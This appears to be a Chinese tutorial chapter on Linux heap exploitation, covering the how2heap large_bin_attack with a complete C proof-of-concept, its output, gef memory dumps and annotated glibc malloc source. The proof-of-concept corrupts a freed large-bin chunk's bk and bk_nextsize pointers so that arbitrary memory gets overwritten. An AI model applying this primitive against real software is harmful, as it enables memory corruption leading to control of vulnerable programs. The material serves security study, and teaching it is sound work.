返回介绍

3.1.9 Linux 堆利用(四)

发布于 2022-02-28 21:35:52 字数 14232 浏览 838 评论 0 收藏 0

  • house_of_rabbit
  • house_of_roman
  • 参考资料
  • 下载文件

    how2heap

    large_bin_attack

    #include<stdio.h>
    #include<stdlib.h>
    
    int main() {
        unsigned long stack_var1 = 0;
        unsigned long stack_var2 = 0;
    
        fprintf(stderr, "The targets we want to rewrite on stack:\n");
        fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
        fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);
    
        unsigned long *p1 = malloc(0x100);
        fprintf(stderr, "Now, we allocate the first chunk: %p\n", p1 - 2);
        malloc(0x10);
    
        unsigned long *p2 = malloc(0x400);
        fprintf(stderr, "Then, we allocate the second chunk(large chunk): %p\n", p2 - 2);
        malloc(0x10);
    
        unsigned long *p3 = malloc(0x400);
        fprintf(stderr, "Finally, we allocate the third chunk(large chunk): %p\n\n", p3 - 2);
        malloc(0x10);
    
        // deal with tcache - libc-2.26
        // int *a[10], *b[10], i;
        // for (i = 0; i < 7; i++) {
        //     a[i] = malloc(0x100);
        //     b[i] = malloc(0x400);
        // }
        // for (i = 0; i < 7; i++) {
        //     free(a[i]);
        //     free(b[i]);
        // }
    
        free(p1);
        free(p2);
        fprintf(stderr, "Now, We free the first and the second chunks now and they will be inserted in the unsorted bin\n");
    
        malloc(0x30);
        fprintf(stderr, "Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist\n\n");
    
        p2[-1] = 0x3f1;
        p2[0] = 0;
        p2[2] = 0;
        p2[1] = (unsigned long)(&stack_var1 - 2);
        p2[3] = (unsigned long)(&stack_var2 - 4);
        fprintf(stderr, "Now we use a vulnerability to overwrite the freed second chunk\n\n");
    
        free(p3);
        malloc(0x30);
        fprintf(stderr, "Finally, we free the third chunk and malloc again, targets should have already been rewritten:\n");
        fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
        fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);
    }
    
    $ gcc -g large_bin_attack.c
    $ ./a.out 
    The targets we want to rewrite on stack:
    stack_var1 (0x7fffffffdeb0): 0
    stack_var2 (0x7fffffffdeb8): 0
    
    Now, we allocate the first chunk: 0x555555757000
    Then, we allocate the second chunk(large chunk): 0x555555757130
    Finally, we allocate the third chunk(large chunk): 0x555555757560
    
    Now, We free the first and the second chunks now and they will be inserted in the unsorted bin
    Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist
    
    Now we use a vulnerability to overwrite the freed second chunk
    
    Finally, we free the third chunk and malloc again, targets should have already been rewritten:
    stack_var1 (0x7fffffffdeb0): 0x555555757560
    stack_var2 (0x7fffffffdeb8): 0x555555757560
    

    该技术可用于修改任意地址的值,例如栈上的变量 stack_var1 和 stack_var2。在实践中常常作为其他漏洞利用的前奏,例如在 fastbin attack 中用于修改全局变量 global_max_fast 为一个很大的值。

    首先我们分配 chunk p1, p2 和 p3,并且在它们之间插入其他的 chunk 以防止在释放时被合并。此时的内存布局如下:

    gef➤  x/2gx &stack_var1 
    0x7fffffffde70:    0x0000000000000000    0x0000000000000000
    gef➤  x/4gx p1-2
    0x555555757000:    0x0000000000000000    0x0000000000000111  <-- p1
    0x555555757010:    0x0000000000000000    0x0000000000000000
    gef➤  x/8gx p2-6
    0x555555757110:    0x0000000000000000    0x0000000000000021
    0x555555757120:    0x0000000000000000    0x0000000000000000
    0x555555757130:    0x0000000000000000    0x0000000000000411  <-- p2
    0x555555757140:    0x0000000000000000    0x0000000000000000
    gef➤  x/8gx p3-6
    0x555555757540:    0x0000000000000000    0x0000000000000021
    0x555555757550:    0x0000000000000000    0x0000000000000000
    0x555555757560:    0x0000000000000000    0x0000000000000411  <-- p3
    0x555555757570:    0x0000000000000000    0x0000000000000000
    gef➤  x/8gx p3+(0x410/8)-2
    0x555555757970:    0x0000000000000000    0x0000000000000021
    0x555555757980:    0x0000000000000000    0x0000000000000000
    0x555555757990:    0x0000000000000000    0x0000000000020671  <-- top
    0x5555557579a0:    0x0000000000000000    0x0000000000000000
    

    然后依次释放掉 p1 和 p2,这两个 free chunk 将被放入 unsorted bin:

    gef➤  x/8gx p1-2
    0x555555757000:    0x0000000000000000    0x0000000000000111  <-- p1 [be freed]
    0x555555757010:    0x00007ffff7dd3b78    0x0000555555757130
    0x555555757020:    0x0000000000000000    0x0000000000000000
    0x555555757030:    0x0000000000000000    0x0000000000000000
    gef➤  x/8gx p2-2
    0x555555757130:    0x0000000000000000    0x0000000000000411  <-- p2 [be freed]
    0x555555757140:    0x0000555555757000    0x00007ffff7dd3b78
    0x555555757150:    0x0000000000000000    0x0000000000000000
    0x555555757160:    0x0000000000000000    0x0000000000000000
    gef➤  heap bins unsorted
    [ Unsorted Bin for arena 'main_arena' ]
    [+] unsorted_bins[0]: fw=0x555555757130, bk=0x555555757000
     →   Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE)   →   Chunk(addr=0x555555757010, size=0x110, flags=PREV_INUSE)
    [+] Found 2 chunks in unsorted bin.
    

    接下来随便 malloc 一个 chunk,则 p1 被切分为两块,一块作为分配的 chunk 返回,剩下的一块继续留在 unsorted bin(p1 的作用就在这里,如果没有 p1,那么切分的将是 p2)。而 p2 则被整理回对应的 large bin 链表中:

    gef➤  x/14gx p1-2
    0x555555757000:    0x0000000000000000    0x0000000000000041  <-- p1-1
    0x555555757010:    0x00007ffff7dd3c78    0x00007ffff7dd3c78
    0x555555757020:    0x0000000000000000    0x0000000000000000
    0x555555757030:    0x0000000000000000    0x0000000000000000
    0x555555757040:    0x0000000000000000    0x00000000000000d1  <-- p1-2 [be freed]
    0x555555757050:    0x00007ffff7dd3b78    0x00007ffff7dd3b78      <-- fd, bk
    0x555555757060:    0x0000000000000000    0x0000000000000000
    gef➤  x/8gx p2-2
    0x555555757130:    0x0000000000000000    0x0000000000000411  <-- p2 [be freed]
    0x555555757140:    0x00007ffff7dd3f68    0x00007ffff7dd3f68      <-- fd, bk
    0x555555757150:    0x0000555555757130    0x0000555555757130      <-- fd_nextsize, bk_nextsize
    0x555555757160:    0x0000000000000000    0x0000000000000000
    gef➤  heap bins unsorted
    [ Unsorted Bin for arena 'main_arena' ]
    [+] unsorted_bins[0]: fw=0x555555757040, bk=0x555555757040
     →   Chunk(addr=0x555555757050, size=0xd0, flags=PREV_INUSE)
    [+] Found 1 chunks in unsorted bin.
    gef➤  heap bins large
    [ Large Bins for arena 'main_arena' ]
    [+] large_bins[63]: fw=0x555555757130, bk=0x555555757130
     →   Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE)
    [+] Found 1 chunks in 1 large non-empty bins.
    

    整理的过程如下所示,需要注意的是 large bins 中 chunk 按 fd 指针的顺序从大到小排列,如果大小相同则按照最近使用顺序排列:

              /* place chunk in bin */
    
              if (in_smallbin_range (size))
                {
                    [ ... ]
                }
              else
                {
                  victim_index = largebin_index (size);
                  bck = bin_at (av, victim_index);
                  fwd = bck->fd;
    
                  /* maintain large bins in sorted order */
                  if (fwd != bck)
                    {
                      /* Or with inuse bit to speed comparisons */
                      size |= PREV_INUSE;
                      /* if smaller than smallest, bypass loop below */
                      assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
                      if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
                        {
                            [ ... ]
                        }
                      else
                        {
                          assert ((fwd->size & NON_MAIN_ARENA) == 0);
                          while ((unsigned long) size < fwd->size)
                            {
                                [ ... ]
                            }
    
                          if ((unsigned long) size == (unsigned long) fwd->size)
                            [ ... ]
                          else
                            {
                              victim->fd_nextsize = fwd;
                              victim->bk_nextsize = fwd->bk_nextsize;
                              fwd->bk_nextsize = victim;
                              victim->bk_nextsize->fd_nextsize = victim;
                            }
                          bck = fwd->bk;
                        }
                    }
                  else
                    [ ... ]
                }
    
              mark_bin (av, victim_index);
              victim->bk = bck;
              victim->fd = fwd;
              fwd->bk = victim;
              bck->fd = victim;
    

    假设我们有一个漏洞,可以对 large bin 里的 chunk p2 进行修改,结合上面的整理过程,我们伪造 p2 如下:

    gef➤  x/8gx p2-2
    0x555555757130:    0x0000000000000000    0x00000000000003f1  <-- fake p2 [be freed]
    0x555555757140:    0x0000000000000000    0x00007fffffffde60      <-- bk
    0x555555757150:    0x0000000000000000    0x00007fffffffde58      <-- bk_nextsize
    0x555555757160:    0x0000000000000000    0x0000000000000000
    

    同样的,释放 p3,将其放入 unsorted bin,紧接着进行 malloc 操作,将 p3 整理回 large bin,这个过程中判断条件 (unsigned long) (size) < (unsigned long) (bck->bk->size) 为假,程序将进入 else 分支,其中 fwd 是 fake p2,victim 是 p3,接着 bck 被赋值为 (&stack_var1 - 2)。

    在 p3 被放回 large bin 并排序的过程中,我们位于栈上的两个变量也被修改成了 victim,对应的语句分别是 bck->fd = victim;ictim->bk_nextsize->fd_nextsize = victim;

    gef➤  x/2gx &stack_var1 
    0x7fffffffde70:    0x0000555555757560    0x0000555555757560
    gef➤  x/8gx p2-2
    0x555555757130:    0x0000000000000000    0x00000000000003f1
    0x555555757140:    0x0000000000000000    0x0000555555757560
    0x555555757150:    0x0000000000000000    0x0000555555757560
    0x555555757160:    0x0000000000000000    0x0000000000000000
    gef➤  x/8gx p3-2
    0x555555757560:    0x0000000000000000    0x0000000000000411
    0x555555757570:    0x0000555555757130    0x00007fffffffde60
    0x555555757580:    0x0000555555757130    0x00007fffffffde58
    0x555555757590:    0x0000000000000000    0x0000000000000000
    

    考虑 libc-2.26 上的情况,还是一样的,处理好 tchache 就可以了,在 free 之前把两种大小的 tcache bin 都占满。

    house_of_rabbit

    house_of_roman

    参考资料

    如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

    扫码二维码加入Web技术交流群

    发布评论

    需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
    列表为空,暂无数据
      我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
      原文